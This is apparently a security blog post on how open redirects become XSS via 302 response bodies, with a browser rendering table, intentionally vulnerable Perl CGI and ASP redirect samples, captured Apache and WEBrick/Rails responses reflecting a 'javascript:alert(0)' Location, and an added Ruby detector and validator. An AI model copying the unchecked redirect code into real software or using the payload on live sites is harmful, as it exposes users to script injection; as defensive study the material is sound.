These days the response body of a 302 redirect, like the ones below, is hard to get a look at: modern browsers follow the redirect automatically and never render it.
However, if the 302 page does get displayed with default browser settings, things become a little interesting, because several web servers build that body out of the Location header, so an open redirect can turn into XSS on the redirect page itself.
Whether the 302 body is rendered (OK) or the browser simply follows the redirect and never shows it (NG), by Location value:
Location value | Chrome | IE | Firefox | Opera (Presto) |
Normal URL | NG | NG | NG | NG |
Blank | OK | NG | OK | OK |
about:blank | NG | NG | NG | OK |
javascript:xxx | NG | NG | NG | OK (Excellent!) |
Although Opera has announced that it will drop its own Presto engine, the XSS flaw in the redirect bodies of some minor web servers may still be usable.
Apache 2.4.7 + Perl
Vulnerable Perl CGI sample code (the url parameter goes straight into the Location header; mod_cgi turns a Location header carrying an absolute URL into a 302 and supplies Apache's own redirect body):
#!/usr/bin/perl
use CGI;
my $cgi = CGI->new();
my $url = $cgi->param("url");    # attacker-controlled, never validated
print "Location: " . $url . "\n\n";    # no scheme or host check before it becomes the Location header
The normal response of an Apache 302 redirect (url=http://www.example.com/) is below:
HTTP/1.1 302 Found
Date: Mon, 15 Sep 2014 13:24:05 GMT
Server: Apache/2.4.7 (Ubuntu)
Location: http://www.example.com/
Content-Length: 281
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.example.com/">here</a>.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at localhost Port 80</address>
</body></html>
This 302 redirect body is most likely hard-coded in the Apache source: it is the standard error document, with the Location value placed in the href of the "here" link.
So the well-known XSS vector '<a href="javascript:xxxx">' looks available here: whatever is passed as url lands in that href. Then the result is:
IIS 7.5 (Windows 7) + ASP
Sample code:
<%
' Classic ASP: the url query parameter is passed unchecked to Response.Redirect
Response.Redirect Request.QueryString("url")
%>
Result:
WEBrick/1.3.1 (serving a Ruby on Rails app; the X-Runtime/X-Request-Id headers and the "You are being redirected" body are what Rails' redirect_to produces)
Response to url=javascript:alert(0):
HTTP/1.1 302 Found
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: javascript:alert(0)
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-Request-Id: bb768842-983e-4ef8-b0e7-795193db1a96
X-Runtime: 0.007491
Server: WEBrick/1.3.1 (Ruby/2.1.2/2014-05-08)
Date: Sun, 06 Jul 2014 12:00:51 GMT
Content-Length: 85
Connection: Keep-Alive
<html><body>You are being <a href="javascript:alert(0)">redirected</a>.</body></html>
Very close! It doesn't work with Presto because of CRLF, but it works with Firefox 5.
And I still have a minor alternative :)
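Two things a practitioner would want after reading the Apache and WEBrick/Rails sections above: a check that flags a captured 302 whose body links back to an executable Location, and the validation a redirect endpoint should have had in the first place. The block below is an added example, not code from the original post or from Apache, Rails or WEBrick. The captured response is constructed from the WEBrick/Rails response shown above (condensed to the headers that matter), and ALLOWED_HOSTS and EXECUTABLE_SCHEMES are assumptions for this example. Note that the check looks at the Location scheme rather than at escaping: "javascript:alert(0)" contains no HTML-special characters, so the HTML escaping both servers apply to the href leaves the vector intact.

```ruby
require 'uri'
require 'cgi'

# Constructed sample: the WEBrick/Rails 302 from the post, condensed to the
# headers that matter, with CRLF line endings as on the wire.
SAMPLE_302 = [
  'HTTP/1.1 302 Found',
  'Location: javascript:alert(0)',
  'Content-Type: text/html; charset=utf-8',
  'Server: WEBrick/1.3.1 (Ruby/2.1.2/2014-05-08)',
  'Content-Length: 85',
  '',
  '<html><body>You are being <a href="javascript:alert(0)">redirected</a>.</body></html>'
].join("\r\n").freeze

# Split a raw HTTP/1.x response into status, a lowercase-keyed header hash and body.
def parse_http_response(raw)
  head, body = raw.split("\r\n\r\n", 2)
  status_line, *header_lines = head.split("\r\n")
  headers = header_lines.each_with_object({}) do |line, h|
    name, value = line.split(':', 2)
    h[name.strip.downcase] = value.to_s.strip
  end
  { status: status_line.split(' ')[1].to_i, headers: headers, body: body.to_s }
end

# Schemes a browser executes instead of fetching (assumed list for this example).
EXECUTABLE_SCHEMES = %w[javascript vbscript].freeze

def location_scheme(location)
  URI.parse(location).scheme.to_s.downcase
rescue URI::InvalidURIError
  ''
end

# True for a 3xx whose body carries the Location value in an href and whose
# Location scheme is one a browser would execute. Escaping is irrelevant here:
# "javascript:alert(0)" survives CGI.escapeHTML / Apache's escaping unchanged.
def reflected_location_xss?(resp)
  return false unless (300..399).cover?(resp[:status])
  location = resp[:headers]['location'].to_s
  return false unless EXECUTABLE_SCHEMES.include?(location_scheme(location))
  resp[:body].include?("href=\"#{CGI.escapeHTML(location)}\"")
end

# Fix side: validate the redirect target before it ever reaches Location.
# Blank, about:blank and javascript: (the OK cells in the browser table) all
# fail here, as do CR/LF (header injection) and hosts outside the allow-list.
ALLOWED_HOSTS = %w[www.example.com].freeze # assumed allow-list for this example

def safe_redirect_target(url, allowed_hosts: ALLOWED_HOSTS)
  return nil if url.nil? || url.strip.empty? || url.match?(/[\r\n]/)
  uri = URI.parse(url)
  return nil unless %w[http https].include?(uri.scheme.to_s.downcase)
  return nil unless allowed_hosts.include?(uri.host.to_s.downcase)
  uri.to_s
rescue URI::InvalidURIError
  nil
end

# Rack-style [status, headers, body] triple, the shape a WEBrick/Rails handler returns.
def redirect_response(url)
  target = safe_redirect_target(url)
  return [400, { 'Content-Type' => 'text/plain' }, ['bad redirect target']] if target.nil?
  body = "<html><body>You are being <a href=\"#{CGI.escapeHTML(target)}\">redirected</a>.</body></html>"
  [302, { 'Location' => target, 'Content-Type' => 'text/html' }, [body]]
end

if __FILE__ == $PROGRAM_NAME
  resp = parse_http_response(SAMPLE_302)
  puts "captured 302 reflects an executable Location: #{reflected_location_xss?(resp)}"
  puts "redirect_response('javascript:alert(0)') => status #{redirect_response('javascript:alert(0)')[0]}"
end
```

Run it with `ruby redirect_check.rb`: the captured response is flagged, and the same javascript: target is refused with a 400 by the hardened handler. A relative Location such as /login is not flagged by the check (no scheme) and the validator rejects scheme-relative //host/ URLs along with anything off the allow-list.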